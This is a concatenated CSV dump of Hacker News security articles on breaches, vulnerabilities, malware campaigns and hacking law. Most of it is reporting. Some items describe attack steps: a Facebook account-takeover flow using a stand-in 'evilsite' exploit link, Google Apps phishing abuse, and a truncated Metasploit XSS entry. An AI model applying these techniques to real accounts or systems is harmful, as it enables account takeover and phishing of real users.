"Young Hacker, Who Took Over Jail Network to Get Friend Released Early, Faces Prison",https://thehackernews.com/2017/12/hacking-jail-records.html,"Well, ""a friend in need is a friend indeed"" goes a long way, but in this case, this phrase hardly makes any sense.
A 27-year-old Michigan man who hacked into the government computer system of Washtenaw County Jail to alter inmate records and gain early release for his friend is now himself facing federal charges after getting caught.
Konrads Voits from Ann Arbor, Michigan, pleaded guilty in federal court last week for hacking into the Washtenaw County government computer system earlier this year using malware, phishing, and social engineering tricks in an attempt to get his friend released early from jail.
Prosecutors say Voits also used phone calls to prison staff claiming to be a manager at the County Jail's IT department and tricking them into downloading and running malware on their computers by visiting a phony website at ""ewashtenavv.org,"" which mimics the Washtenaw official URL, ""ewashtenaw.org.""
Voit then obtained the remote login information of one of the Jail employees and used that information to install malware on the County's network and gain access to sensitive County's XJail system in March this year.
Gaining access to this system eventually allowed Voits to steal jail records of several inmates, search warrant affidavits and personal details, including passwords, usernames, and email addresses, of over 1,600 employees, along with altering electronic records of at least one inmate for early release.
However, things did not work as Voits wanted them to, and instead, they all backfired on him when jail employees detected changes in their records and alerted the FBI.
No prisoners were then released early.
This incident took place between January 24th, 2017 and March 10th, 2017 and cost Washtenaw County more than $235,000 to fix the whole mess before authorities busted Voits.
""Cyber intrusions affect individuals, businesses and governments. Computer hackers should realize that unlawfully entering another's computer will result in a felony conviction and a prison sentence,"" said the United States Attorney Daniel Lemisch.
""We applaud the dedication of so many hard-working law enforcement officers to take away this man's [Voits] ability to intrude into the computer systems of others.""
Voits was arrested by the authorities a month later and pleaded guilty last week. He is now facing a fine of up to $250,000 and a maximum sentence of ten years prison, though he is unlikely to receive the maximum sentence.
Voits has agreed to surrender his belongings used during the attack, including his laptop, four cellphones and an undisclosed amount of Bitcoin.
Voits is currently in federal custody and is set to face a sentencing hearing on 5 April 2018.
Fake Digital Certificates Found in the Wild While Observing Facebook SSL Connections,https://thehackernews.com/2014/05/fake-digital-certificates-found-in-wild.html,"Visiting a website certified with an SSL certificate doesn't mean that the website is not bogus. Secure Sockets Layer (SSL) protect the web users in two ways, it uses public key encryption to encrypt sensitive information between a user's computer and a website, such as usernames, passwords, or credit card numbers and also verify the identity of websites.
Today hackers and cyber criminals are using every tantrum to steal users' credentials and other sensitive data by injecting fake SSL certificates to the bogus websites impersonating Social media, e-commerce, and financial websites as well.
A Group of researchers, Lin-Shung Huang , Alex Ricey , Erling Ellingseny and Collin Jackson, from the Carnegie Mellon University in collaboration with Facebook have analyzed [PDF] more than 3 million SSL connections and found strong evidence that at least 6;845 (0:2%) of them were in fact tampered with forged certificates i.e. self-signed digital certificates that aren't authorized by the legitimate website owners, but will be accepted as valid by most browsers.
They utilized the widely-supported Flash Player plug-in to enable socket functionality and implemented a partial SSL handshake on our own to capture forged certificates and deployed this detection mechanism on an Alexa top 10 website, Facebook, which terminates connections through a diverse set of network operators across the world.
Generally Modern web browsers display a warning message when encountering errors during SSL certificate validation, but warning page still allows users to proceed over a potentially insecure connection.
Fake SSL connections can argue that certificate warnings are mostly caused by server mis-configurations. According to usability survey, many users actually ignore SSL certificate warnings and trusting forged certificates could make them vulnerable to the simplest SSL interception attacks.
This means that a potential hacker can successfully impersonate any website, even for secure connections i.e. HTTPS, to perform an SSL ma-in-the-middle attack in order to intercept encrypted connections.
Researchers observed most of the forged SSL certificate are using same name as original Digital Certificate issuer organizations, such as VeriSign, Comodo.
Some Antivirus software such as Bitdefender, ESET, BullGuard, Kaspersky Lab, Nordnet, DefenderPro etc., has ability to intercept/Scan SSL connection on Clients' system in order to defend their users from Fake SSL connections. These Antivirus products generate their own certificates that would be less alarming than other Self-signed digital certificates.
""One should be wary of professional attackers that might be capable of stealing the private key of the signing certificates from antivirus vendors, which may essentially allow them to spy on the antivirus users (since the antivirus root certificate would be trusted by the client),"" the researchers explained. ""Hypothetically, governments could also compel antivirus vendors to hand over their signing keys.""
Similar capabilities are observed in various Firewall, Parental Control Software and adware software those could be compromised by hackers in order to generate valid, but fake digital certificates.
Researchers also noticed another interesting self-signed digital certificate, named as 'IopFailZeroAccessCreate', which was generated by some malware on client-end systems and using same name as trusted Certificate issuer ""VeriSign Class 4 Public Primary CA.""
""These variants provide clear evidence that attackers in the wild are generating certificates with forged issuer attributes, and even increased their sophistication during the time frame of our study,"" they said.
Detected statistics shows that the clients infected with same malware serving 'IopFailZeroAccessCreate' bogus digital certificates were widespread across 45 different countries, including Mexico, Argentina and the United States.
Malware researchers at Facebook, in collaboration with the Microsoft Security Essentials team, were able to confirm these suspicions and identify the specific malware family responsible for this attack.
Attackers may also restrict Flash-based sockets by blocking Flash socket policy traffic on port 843 or can avoid intercepting SSL connections made by the Flash Player in order to bypass detection techniques used by the researchers. To counter this, websites could possibly serve socket policy files over firewall-friendly ports (80 or 443), by multiplexing web traffic and socket policy requests on their servers.
In Addition, researchers have discussed migration techniques in the paper such as HTTP Strict Transport Security (HSTS), Public Key Pinning Extension for HTTP (HPKP), TLS Origin-Bound Certificates (TLS-OBC), Certificate Validation with Notaries and DNS-based Authentication of Named Entities (DANE), those could be used by servers to enforce HTTPS and validate digital certificates.
If you are also infected by any similar malware, please follow below given steps to remove it:
Check your hosts file (C:\Windows\System32\Drivers\etc\hosts) for malicious entries
Check your DNS (Domain Name Server) settings on system and DSL Modem
Verify your proxy settings on browser
Cross-check your installed Browser addons.
Install reputed Antivirus and Firewall Product and Scan for malicious files
"Hack or attempt to Hack, you may face 20 years in prison",https://thehackernews.com/2014/01/hacker-Personal-Data-Privacy-Security-Act.html,"The Senate Judiciary Committee Chairman 'Patrick Leahy' reintroduced a revamped version of the ""Personal Data Privacy and Security Act"" for tough criminal penalties for hackers, that he originally authored in 2005.
During last Christmas Holidays, a massive data breach had occurred at the shopping giant Target, involving hack of 40 million credit & debit cards, used to pay for purchases at its 1500 stores nationwide in the U.S.
Reason: ""Target Data Breach? Seriously""? In a statement, as published below, the Senator wrote:
""The recent data breach at Target involving the debit and credit card data of as many as 40 million customers during the Christmas holidays is a reminder that developing a comprehensive national strategy to protect data privacy and cybersecurity remains one of the most challenging and important issues facing our Nation""
It seems that the TARGET Breach was scheduled, as the best opportunity to ramp up the cyber security laws against all kinds of Hackers.
Finally, on Wednesday he has re-introduced a more strict version of the ""Personal Data Privacy and Security Act"" bill that aims to protect Americans' data from cyber criminals. He wrote in a statement,
""The Personal Data Privacy and Security Act will help to meet this challenge, by better protecting Americans from the growing threats of data breaches and identity theft.""
In his proposal, the companies with databases containing sensitive customer information will have to adopt a 'nationwide standard' of internal policies to defend against cyber attacks. It will also provide an alert notice to all Americans users, when they have been victims of such data breach.
No Doubt, I am also in favor to give strict sentences to the Cyber criminals who are involved in Malware related crimes, financial hacks, cyber bullying, espionage or spying, but this Bill now also covers strict sentencing for hactivists and hackers who have nothing to do with financial data. I have explained these facts about the bill as follow:
Obviously, I smell a Rat here!
New Penalty - 20 Years, rather than 10: Another most important modification is proposed to increase the maximum sentence for a first-time offender from 10 years to 20.
Cyber Criminal = Hacktivist = Anonymous = Cyber Fraud ≠ NSA: Unfortunately, this Bill will also apply to all types of hackers, who is involved in Data Breaches, Cyber Fraud activities, Identity theft, Malware developers as well as on the other hackers including Anonymous, Hacktivist etc. who is not hacking for financial benefits.
""The bill also includes the Obama administration's proposal to update the Computer Fraud and Abuse Act, so that attempted computer hacking and conspiracy to commit computer hacking offenses are subject to the same criminal penalties, as the underlying offenses.""
If you haven't forgotten the news of the Hactivist Jeremy Hammond, who was sentenced 10 years in prison under the same Computer Fraud and Abuse Act (CFAA) for hacking into private intelligence contractor Stratfor and attempting to highlight Stratfor's work as a private intelligence firm.
He exposed Surveillance operation done by Stratfor on the political protesters at the behest of both private companies and the government. His attack was for political purpose, rather than financial.
Attempt to Hack = Successfully Hacked: If you are even planning to hack someone, then, according to this updated Bill, you are also considered as a Criminal. The Senator also proposed that the hackers who are unsuccessful in their actions are punished as severely as more accomplished ones regardless.
Considering the NSA's unethical Hacking operation? Now that's interesting! Whistle-blowing comes under a massive crime, but spying on the whole world by the their own NSA comes under nothing from any above??
Recently, The Security researcher Jacob Appelbaum accused the NSA of illegally hacking the massive amounts of private data of users under the guise of counterterrorism. ""NSA gets to do something like intercepting 7 billion people all day long with no problems. And the rest of us are not even allowed to experiment with improving the security of our own lives without being put in prison or under threat of serious indictment."" he said.
Making Laws more strict for hackers with criminal or Fraud activities is OKAY, but what about the team of hackers who are unethically hacking into world's telecommunication companies, devices or the database of Big Internet companies?
Now, this is something on what U.S Government won't give a damn look!
Google Developer Discovers a Critical Bug in Modern Web Browsers,https://thehackernews.com/2018/06/browser-cross-origin-vulnerability.html,"Google researcher has discovered a severe vulnerability in modern web browsers that could have allowed websites you visit to steal the sensitive content of your online accounts from other websites that you have logged-in the same browser.
Discovered by Jake Archibald, developer advocate for Google Chrome, the vulnerability resides in the way browsers handle cross-origin requests to video and audio files, which if exploited, could allow remote attackers to even read the content of your Gmail or private Facebook messages.
For security reasons, modern web browsers don't allow websites to make cross-origin requests to a different domain unless any domain explicitly allows it.
That means, if you visit a website on your browser, it can only request data from the same origin the site was loaded from, preventing it from making any unauthorized request on your behalf in an attempt to steal your data from other sites.
However, web browsers do not respond in the same way while fetching media files hosted on other origins, allowing a website you visit to load audio/video files from different domains without any restrictions.
Moreover, browsers also support range header and partial content responses, allowing websites to serve partial content of a large media file, which is useful while playing a large media or downloading files with pause and resume ability.
In other words, media elements have an ability to join pieces of multiple responses together and treat it as a single resource.
However, Archibald found that Mozilla FireFox and Microsoft Edge allowed media elements to mix visible and opaque data or opaque data from multiple sources together, leaving a sophisticated attack vector open for attackers.
In a blog post published today, Archibald detailed this vulnerability, which he dubbed Wavethrough, explaining how an attacker can leverage this feature to bypass protections implemented by browsers that prevent cross-origin requests.
""Bugs started when browsers implemented range requests for media elements, which wasn't covered by the standard. These range requests were genuinely useful, so all browsers did it by copying each others behaviour, but no one integrated it into the standard,"" Archibald explained.
According to Archibald, this loophole can be exploited by a malicious website using an embedded media file on its webpage, which if played, only serves partial content from its own server and asks the browser to fetch rest of the file from a different origin, forcing the browser to make a cross-origin request.
The second request, which actually is a cross-origin request and should be restricted, will be successful because mixing visible and opaque data are allowed for a media file, allowing one website to steal content from the other.
""I created a site that does the above. I used a PCM WAV header because everything after the header is valid data, and whatever Facebook returned would be treated as uncompressed audio,"" Archibald said.
Archibald has also published a video, and a proof-of-concept exploit demonstrating how a malicious website can fetch your private content from websites like Gmail and Facebook, whose response will be same for the malicious site as your browser loads them for you.
Since Chrome and Safari already have a policy in place to reject such cross-origin requests as soon as they see any redirection after the underlying content appears to have changed between requests, their users are already protected.
""This is why standards are important. I believe Chrome had a similar security issue long ago, but instead of just fixing it in Chrome, the fix should have been written into a standard, and tests should have been written for other browsers to check against,"" Archibald said.
FireFox and Edge browsers that were found vulnerable to this issue have also patched the vulnerability in their latest versions after Archibald responsibly reported it to their security teams.
Therefore, FireFox and Edge browser users are highly recommended to make sure that they are running the latest version of these browsers.
Hacker Abuses Google Apps vulnerability for Sending Phishing Emails,https://thehackernews.com/2015/03/google-apps-vulnerability.html,"A critical vulnerability has been discovered in the Google Apps for Work that allows hackers to abuse any website's domain name based email addresses, which could then be used to send phishing emails on company's behalf in order to target users.
If you wish to have an email address named on your brand that reads like admin@yourdomain.com instead of myemail@gmail.com, then you can register an account with Google Apps for Work.
The Google Apps for Work service allows you to use Gmail, Drive storage, Calendar, online documents, video Hangouts, and other collaborative services with your team or organization.
To get a custom domain name based email service from Google, one just need to sign up like a normal Gmail account. Once created, you can access your domain's admin console panel on Google app interface, but can not be able to use any service until you get your domain verified from Google.
Cyber security researchers Patrik fehrenbach and Behrouz sadeghipour found that an attacker can register any unused (not previously registered with Google apps service) domain, example: bankofanycountry.com with Google apps for Work to obtain 'admin@bankofanycountry.com' account.
But obviously, Google would not let you access email service for 'admin@bankofanycountry.com', until domain verification has been completed, which means neither you can send any email from that account, nor you can receive.
However, the duo explained The Hacker News that there is a page on Google apps that allows domain admin to send 'Sign in Instructions' to the organization users i.e. info@bankofanycountry.com (must be created from panel before proceeding) by accessing following URL directly on the browser.
Using the compose email interface, as shown, an attacker could send any kind of phishing email containing malicious link to the target users, in an attempt to trick them into revealing their personal information including passwords, financial details or any other sensitive information.
As shown below, researchers successfully obtained admin@vine.com (acquired by Twitter) and send a mail to victim, contains a subject: Welcome to Twitter, which can convince users into submitting their Twitter credentials to the given phishing pages.
Researchers reported this security and privacy issue to the search engine giant, and the company has applied, what I think, a partial patch to the flaw. As, it is still allowing an attacker to access 'Send Sign in Instructions' for unverified domains, but this time via apps-noreply@google.com, instead of the custom email address.
In an email conversation, Behrouz told The Hacker News, ""Google believes that showing the sender as apps-noreply is good enough.""
But, the consequences are still the same because it won't stop hackers from targeting victims.
Generally, Google automatically helps identify spam and suspicious emails and mark them as spam or phishing warnings, like they're from a legitimate source, such as your bank or Google, but they're not.
However, by abusing above Google vulnerability, hackers could send phishing emails right into your inbox with no warning as the email has been generated from Google's own servers.
5-Year-Old Linux Kernel Local Privilege Escalation Flaw Discovered,https://thehackernews.com/2016/12/linux-kernel-local-root-exploit.html,"A 5-year-old serious privilege-escalation vulnerability has been discovered in Linux kernel that affects almost every distro of the Linux operating system, including Redhat, and Ubuntu.
Over a month back, a nine-year-old privilege-escalation vulnerability, dubbed ""Dirty COW,"" was discovered in the Linux kernel that affected every distro of the open-source operating system, including Red Hat, Debian, and Ubuntu.
Now, another Linux kernel vulnerability (CVE-2016-8655) that dates back to 2011 disclosed today could allow an unprivileged local user to gain root privileges by exploiting a race condition in the af_packet implementation in the Linux kernel.
Philip Pettersson, the researcher who discovered the flaw, was able to create an exploit to gain a root shell on an Ubuntu 16.04 LTS system (Linux Kernel 4.4) and also defeated SMEP/SMAP (Supervisor Mode Execution Prevention/Supervisor Mode Access Prevention) protection to gain kernel code execution abilities.
In other words, a local unprivileged attacker can use this exploit to cause a denial of service (crashing server) or run arbitrary malicious code with administrative privileges on the targeted system.
""A race condition issue leading to a use-after-free flaw was found in the way the raw packet sockets implementation in the Linux kernel networking subsystem handled synchronization while creating the TPACKET_V3 ring buffer,"" Red Hat security advisory explains.
""A local user able to open a raw packet socket (requires the CAP_NET_RAW capability) could use this flaw to elevate their privileges on the system.""
This threat creates a potential danger for service providers to have their servers crashed or hacked through this Linux kernel vulnerability.
""On Android, processes with gid=3004/AID_NET_RAW are able to create AF_PACKET sockets (mediaserver) and can trigger the bug,"" Pettersson explains.
The vulnerability was patched in the mainline kernel last week, so users are advised to update their Linux distro as soon as possible.
Google's New Tool Alerts When You Use Compromised Credentials On Any Site,https://thehackernews.com/2019/02/google-password-checkup-breaches.html,"With so many data breaches happening almost every week, it has become difficult for users to know if their credentials are already in possession of hackers or being circulated freely across the Internet.
Thankfully, Google has a solution.
Today, February 5, on Safer Internet Day, Google launches a new service that has been designed to alert users when they use an exact combination of username and password for any website that has previously been exposed in any third-party data breach.
The new service, which has initially been made available as a free Chrome browser extension called Password Checkup, works by automatically comparing the user's entered credential on any site to an encrypted database that contains over 4 billion compromised credentials.
If the credentials are found in the list of compromised ones, Password Checkup will prompt users to change their password.
Wondering if Google can see your login credentials? No, the company has used a privacy-oriented implementation that keeps all your information private and anonymous by encrypting your credentials before checking them against its online database.
""We designed Password Checkup with privacy-preserving technologies to never reveal this personal information to Google,"" the company emphasizes. ""We also designed Password Checkup to prevent an attacker from abusing Password Checkup to reveal unsafe usernames and passwords. Finally, all statistics reported by the extension are anonymous.""
You can also check this easy 4-step visual explanation to learn more about how it works under the hood.
Moreover, it is not yet another ""weak password warning tool"" that alerts users whenever they use a commonly used or easily crackable password for any website.
""We designed Password Checkup only to alert you when all of the information necessary to access your account has fallen into the hands of an attacker,"" Google says.
""We will not bother you about outdated passwords youn have already reset or merely weak passwords like '123456.' We only generate an alert when both your current username and password appear in a breach, as that poses the greatest risk.""
The Chrome browser extension, Password Checkup, is available from today, and anyone can download it for free.
Besides launching the new Chrome extension, Google also lists five Official Security Tips which includes keeping your software up-to-date, using unique passwords for every site, taking the Google security checkup, setting up a recovery phone number or email address, and making use of two-factor authentication.
Chrome users can follow these security tips to keep themselves safe on the Internet.
Vodafone Iceland hacked and exposed 70000 Users' Personal Information,https://thehackernews.com/2013/11/vodafone-iceland-hacked-and-exposed.html,"Today Vodafone Iceland was hacked by the Turkish group of hackers Maxn3y (@AgentCoOfficial) who in the past has stolen data from airports' systems, electronic giants and fast food company.
The hackers announced via Twitter that he has successfully compromised Vodafone Iceland server and defaced the official website (Vodafone.is), including various other sub-domains including the company mobile site.
The hackers disclosed a compressed 61.7MB rar file which is locked with password TURKISH and that contains a collection of files including one titled users.sql that appears to contain the 77,000 user accounts.
The file includes user names, social security numbers, encrypted passwords as many other encrypted information. The portal CyberWarNews posted the list of files disclosed and provided information on their content.
Following the complete list of files leaked:
Multimedia database, nothing critical, 400K of user tracking and logging with user agents, refers etc.
Sms history with what appears to be full text messages to a from numbers with timestamps, all dated 2011-08-19
SMS logger sender id, sms id, user IP, date.
900k rows of user contact details related to an SMS plan.
User names, ids, encrypted passwords, email addresses, social security numbers, dates, bank details (alot is incomplete)
Account manager's details
Full names, phone numbers, email addresses.
sms_history.sql and signup.sql explained above.
XLS files
kennitala (social security numbers), dates, ticket numbers, campaign ids(unknown campaign), email addresses
Count: 23,494
id, code(unknown), msisdn, sms, timestamp(ts)
Count: 1001
Id, full name (nafn), kennitala (SSN), pnr, confirmed, date, ticket, email, senda, receiver.
Count: 4305
Id, IP addresses, user name, encrypted passwords, email addresses, first name, last name, phone, fax, Reg date, last active, user level, notes
Count: 334
Id, school. login. Clear text passwords, names, isadmin, active
Count: 18
Id, timestamp, IP, session id, social security numbers, email addresses
Count: 1491
Id, phone, social security numbers, email addresses, ticket id, registration status, date, IP
Count: 1247
User names, clear text passwords, names, email addresses and permissions
Count: 12
cart_id, names, social security numbers, postal codes, email addresses, credit card names, nulled credit card numbers and dates, sale amounts.
Count: 3086
Real name, email addresses, company's, chairman name.
Count: 31
Id, content, date, email addresses
Count: 1929
usernames, clear text passwords, active, company's, full addresses, contact numbers, websites, nulled locations.
Count: 767
User names, 5x full names, phone numbers, social security numbers
Count: 71
Names, partner countries, to Iceland (nothing important)
Count: 10
Session id and details encrypted, (nothing important)
Count: 49, 468
File name says all, nothing of importance here.
File name says all, nothing of importance here.
Vodafone Iceland website was rapidly restored, but at the time I'm writing it is not reachable.
DDoS Attacks originated from thousands of .EDU and .GOV WordPress Blogs,https://thehackernews.com/2013/12/ddos-attacks-originated-from-thousands.html,"In a recent cyber attack on a Forum site, thousands of outdated legitimate WordPress blogs were abused to perform DDOS attacks using previously known vulnerabilities.
After analyzing the Log file from the victim's server, we have noticed many Wordpress CMS based educational (.EDU) and Government (.GOV) websites from where the attack was originated.
In the past we have reported about many such cyber attacks, where attackers hacked into the Wordpress blogs using password brute-force attack or they used the PINGBACK vulnerability in older versions of Wordpress without compromising the server.
WordPress has a built in functionality called Pingback, which allows anyone to initiate a request from WordPress to an arbitrary site and it can be used for a single machine to originate millions of requests from multiple locations.
We have seen more than 100,000 IP addresses involved in the recent DDOS attack and the victim's Forum website received more than 40,000 requests in 7 minutes from different Wordpress blogs and IP addresses.
In this recent attack, we have noticed more than 4000 .EDU and .GOV sites along with thousands of other abused sites, including following:
and thousands more..
These large servers can cause much more damage in DDoS attacks because the servers have the large network bandwidth and are capable of generating significant amounts of traffic.
At this time it's not clear that either these Wordpress blogs are compromised or the Pingback vulnerability was used to perform the attack.
But It's always wise to learn from other's mistake. If you still use 'admin' or common name as a user name on your blog, change it, use a strong password. There are also security plug-ins available, two-factor authentication options available for WordPress and of course make sure you are up-to-date on the latest version of WordPress.
"Snowden reveals, GCHQ planted malware via LinkedIn and Slashdot traffic to hack Belgacom Engineers",https://thehackernews.com/2013/11/snowden-reveals-gchq-planted-malware.html,"Edward Snowden, a former contractor at America's National Security Agency (NSA), has rocked the intelligence world by leaking secret documents which reveal the previously unknown extent of global spying. But looks like the NSA isn't the only one using dirty digital tricks to hack its targets.
Back in September, it was reported that the UK's equivalent of the NSA, GCHQ had hacked Belgacom, a leading telecommunications provider in Belgium.
Some New analysis of the Snowden papers by German magazine Der Spiegel shows that British intelligence agency GCHQ created fake LinkedIn and Slashdot pages to spy on computers of Belgacom network engineers.
Communications networks are particularly valuable to spies, because they allow instant access to individual users. Belgacom provides internet access to dozens of key EU institutions based in its capital city Brussels and its global roaming exchange is a hub for connections between various international mobile networks.
GCHQ reportedly used a method called ""quantum insert"", to redirect employees of Belgacom, Belgium's largest telecommunications company, to fake websites that contained malware.
According to Der Spiegel, the first step for GCHQ was to identify employees at Belgacom working in its security and maintenance divisions, including finding out which ones use LinkedIn and Slashdot.
Then they redirected the intercepted traffic (using Man in the middle attack) to a spoofed server (codenamed ""Fox Acid""), which can respond faster than the real one, is placed somewhere on the Internet backbone.
The documents reveal the extent to which spy agencies are able to use mobile communications to track people down and for surveillance. One document claimed, ""We can locate, collect, exploit (in real time where appropriate) high-value mobile devices and services in a fully converged target centric manner.""
A LinkedIn spokesman told Der Spiegel, ""We were never told about this alleged activity and we would never approve of it, irrespective of what purpose it was used for.""
It's unclear whether the GCHQ has its own version of FoxAcid or whether it just piggybacks on the NSA's servers as per their unique surveillance cooperation relationship. Slashdot hasn't responded to a request for comment.
I wonder if there is any possibility that LinkedIn and Slashdot can go after the government on legal basis for effectively attacking their servers?
Metasploit 4.1.0 Web UI Cross Site Scripting vulnerability,https://thehackernews.com/2011/10/metasploit-410-web-ui-cross-site.html,"Metasploit 4.1.0 Web UI Cross Site Scripting vulnerability
The Web UI in Metasploit version 4.1.0 suffers from a stored cross site scripting vulnerability discovered by ""Stefan Schurtz"".
Technical Details
Login to Web UI -> Create New Project -> Project name -> '""
North Korean Hackers Trying to Steal COVID-19 Vaccine Research,https://thehackernews.com/2020/12/north-korean-hackers-trying-to-steal.html,"Threat actors such as the notorious Lazarus group are continuing to tap into the ongoing COVID-19 vaccine research to steal sensitive information to speed up their countries' vaccine-development efforts.
Cybersecurity firm Kaspersky detailed two incidents at a pharmaceutical company and a government ministry in September and October leveraging different tools and techniques but exhibiting similarities in the post-exploitation process, leading the researchers to connect the two attacks to the North Korean government-linked hackers.
""These two incidents reveal the Lazarus group's interest in intelligence related to COVID-19,"" Seongsu Park, a senior security researcher at Kaspersky, said. ""While the group is mostly known for its financial activities, it is a good reminder that it can go after strategic research as well.""
Kaspersky did not name the targeted entities but said the pharmaceutical firm was breached on September 25, 2020, with the attack against the government health ministry occurring a month later, on October 27.
Notably, the incident at the pharmaceutical company — which is involved in developing and distributing a COVID-19 vaccine — saw the Lazarus group deploying the ""BookCodes"" malware, recently used in a supply-chain attack of a South Korean software company WIZVERA to install remote administration tools (RATs) on target systems.
The initial access vector used in the attack remains unknown as yet, but a malware loader identified by the researchers is said to load the encrypted BookCodes RAT that comes with capabilities to collect system information, receive remote commands, and transmit the results of the execution to command-and-control (C2) servers located in South Korea.
In a separate campaign aimed at the health ministry, the hackers compromised two Windows servers to install a malware known as ""wAgent,"" and then used it to retrieve other malicious payloads from an attacker-controlled server.
As with the previous case, the researchers said they were unable to locate the starter module used in the attack but suspect it to have a ""trivial role"" of running the malware with specific parameters, following which wAgent loads a Windows DLL containing backdoor functionalities directly into memory.
""Using this in-memory backdoor, the malware operator executed numerous shell commands to gather victim information,"" Park said.
Irrespective of the two malware clusters employed in the attacks, Kaspersky said the wAgent malware used in October shared the same infection scheme as the malware that the Lazarus group used previously in attacks on cryptocurrency businesses, citing overlaps in the malware naming scheme and debugging messages, and the use of Security Support Provider as a persistence mechanism.
The development is the latest in a long list of attacks capitalizing on the coronavirus pandemic — a trend observed in various phishing lures and malware campaigns throughout the last year. North Korean hackers are alleged to have targeted pharma firms in India, France, Canada, and the UK-based AstraZeneca.
New Spectre Flaws in Intel and AMD CPUs Affect Billions of Computers,https://thehackernews.com/2021/05/new-spectre-flaws-in-intel-and-amd-cpus.html,"When Spectre, a class of critical vulnerabilities impacting modern processors, was publicly revealed in January 2018, the researchers behind the discovery said, ""As it is not easy to fix, it will haunt us for quite some time,"" explaining the inspiration behind naming the speculative execution attacks.
Indeed, it's been more than three years, and there is no end to Spectre in sight.
A team of academics from the University of Virginia and University of California, San Diego, have discovered a new line of attack that bypasses all current Spectre protections built into the chips, potentially putting almost every system — desktops, laptops, cloud servers, and smartphones — once again at risk just as they were three years ago.
The disclosure of Spectre and Meltdown opened a floodgates of sorts, what with endless variants of the attacks coming to light in the intervening years, even as chipmakers like Intel, ARM, and AMD have continually scrambled to incorporate defenses to alleviate the vulnerabilities that permit malicious code to read passwords, encryption keys, and other valuable information directly from a computer's kernel memory.
A timing side-channel attack at its core, Spectre breaks the isolation between different applications and takes advantage of an optimization method called speculative execution in CPU hardware implementations to trick programs into accessing arbitrary locations in memory and thus leak their secrets.
""A Spectre attack tricks the processor into executing instructions along the wrong path,"" the researchers said. ""Even though the processor recovers and correctly completes its task, hackers can access confidential data while the processor is heading the wrong way.""
The new attack method exploits what's called a micro-operations (aka micro-ops or μops) cache, an on-chip component that decomposes machine instructions into simpler commands and speeds up computing, as a side-channel to divulge secret information. Micro-op caches have been built into Intel-based machines manufactured since 2011.
""Intel's suggested defense against Spectre, which is called LFENCE, places sensitive code in a waiting area until the security checks are executed, and only then is the sensitive code allowed to execute,"" Ashish Venkat, an assistant professor at the University of Virginia and a co-author of the study, said. ""But it turns out the walls of this waiting area have ears, which our attack exploits. We show how an attacker can smuggle secrets through the micro-op cache by using it as a covert channel.""
On AMD Zen microarchitectures, the micro-ops disclosure primitive can be exploited to achieve a covert data transmission channel with a bandwidth of 250 Kbps with an error rate of 5.59% or 168.58 Kbps with error correction, the researchers detailed.
Intel, in its guidelines for countering timing attacks against cryptographic implementations, recommends adhering to constant-time programming principles, a practice that's easier said than done, necessitating that software changes alone cannot adequately mitigate threats arising out of speculative execution.
""Constant-time programming is not only hard in terms of the actual programmer effort, but also entails high performance overhead and significant deployment challenges related to patching all sensitive software,"" Venkat said in a statement shared with The Hacker News. ""The percentage of code that is written using Constant Time principles is in fact quite small. Relying on this would be dangerous. That is why we still need to secure the hardware""
The silver lining here is that exploiting Spectre vulnerabilities is difficult. To safeguard from the new attack, the researchers propose flushing the micro-ops cache, a technique that offsets the performance benefits gained by using the cache in the first place, leverage performance counters to detect anomalies in the micro-op cache, and partition it based on the level of privilege assigned to the code and prevent unauthorized code from gaining higher privileges.
""The micro-op cache as a side channel has several dangerous implications,"" the researchers said. ""First, it bypasses all techniques that mitigate caches as side channels. Second, these attacks are not detected by any existing attack or malware profile. Third, because the micro-op cache sits at the front of the pipeline, well before execution, certain defenses that mitigate Spectre and other transient execution attacks by restricting speculative cache updates still remain vulnerable to micro-op cache attacks.""
Vulnerability allows Hacking Facebook account and password reset within a minute,https://thehackernews.com/2013/07/vulnerability-allows-hacking-facebook.html,"Security expert Dan Melamed discovered a critical vulnerability in Facebook platform that allow an attacker to take complete control over any account.
The vulnerability is considered critical because it would allow a hacker to hack potentially any Facebook account. Dan Melamed presented the discovery on his blog. Dan demonstrated that how a hacker can reset the victim's account password just by tricking him to visit a malicious exploit code.
The flaw affects the Facebook ""claim email address"" component. When an user tries to add an email address already registered to Facebook platform, he has the option to ""claim it"". The loophole exists here, when user claim an email address, Facebook did not check from whom the request came from. This allows an email to be claimed on any Facebook account.
The exploit is possible provided that:
An existing account having the email address that the attacker wants to claim.
Another existing account to initiate the claim process.
Dan provided a video of proof of concept:
When user makes a claim request for an @hotmail.com email he is taken to a link that appears like this:
The researcher discovered that the parameter appdata[fbid] was the encrypted email address. Dan used the encrypted email funnyluv196@hotmail.com for the POC. The link will redirect user to the sign in page for Hotmail.
""You must sign in with the email address that matches the encrypted parameter. Once signed in, you are taken to a final link that looks like this:
https://www.facebook.com/support/openid/accept_hotmail.php?appdata=%7B%22fbid%22%3A%22AQ3Tcly2XEfbzuCqyhZXfb8_hYHTnHPPd-CDsvdrLzDnWLpsKTMcaXtIzV0qywEwbPs%22%7D&code=a6893043-cf19-942b-c686-1aadb8b21026 ""
The source code confirms that the claim email process has succeeded:
Dan Melamed sustains that the exploit is very simple to conduct and it is advantaged by 2 important aspects:
The link expires in around 3 hours, giving plenty of time for a hacker to use it.
It can be visited on any Facebook account because there is no check to see who made this request.
To trick the victim, hacker has just to insert the (https://evilsite.com/evilpage.html) exploit link on a webpage as either an image or an iframe.
""Once clicked, the email (in this case: funnyluv196@hotmail.com) is instantly added to their Facebook account. The victim does not receive any notification whatsoever that this email has been added. The hacker can then reset the victim's password using the newly added email address. Thus allowing the attacker to take complete control over the Facebook account.""
This vulnerability has been confirmed to be patched by the Facebook Security Team, fortunately the group is very responsive as demonstrated for the fix of other recent flaws. It must be considered that the popular social networking platform is very attractive for cybercrime and many other categories of attackers, cyber security is a critical aspect for its business success.
Necro Python Malware Upgrades With New Exploits and Crypto Mining Capabilities,https://thehackernews.com/2021/06/necro-python-malware-upgrades-with-new.html,"New upgrades have been made to a Python-based ""self-replicating, polymorphic bot"" called Necro in what's seen as an attempt to improve its chances of infecting vulnerable systems and evading detection.
""Although the bot was originally discovered earlier this year, the latest activity shows numerous changes to the bot, ranging from different command-and-control (C2) communications and the addition of new exploits for spreading, most notably vulnerabilities in VMWare vSphere, SCO OpenServer, Vesta Control Panel and SMB-based exploits that were not present in the earlier iterations of the code,"" researchers from Cisco Talos said in a deep-dive published today.
Said to be in development as far back as 2015, Necro (aka N3Cr0m0rPh) targets both Linux and Windows devices, with heightened activity observed at the start of the year as part of a malware campaign dubbed ""FreakOut"" that was found exploiting vulnerabilities in network-attached storage (NAS) devices running on Linux machines to co-opt the machines into a botnet for launching distributed denial-of-service (DDoS) attacks and mining Monero cryptocurrency.
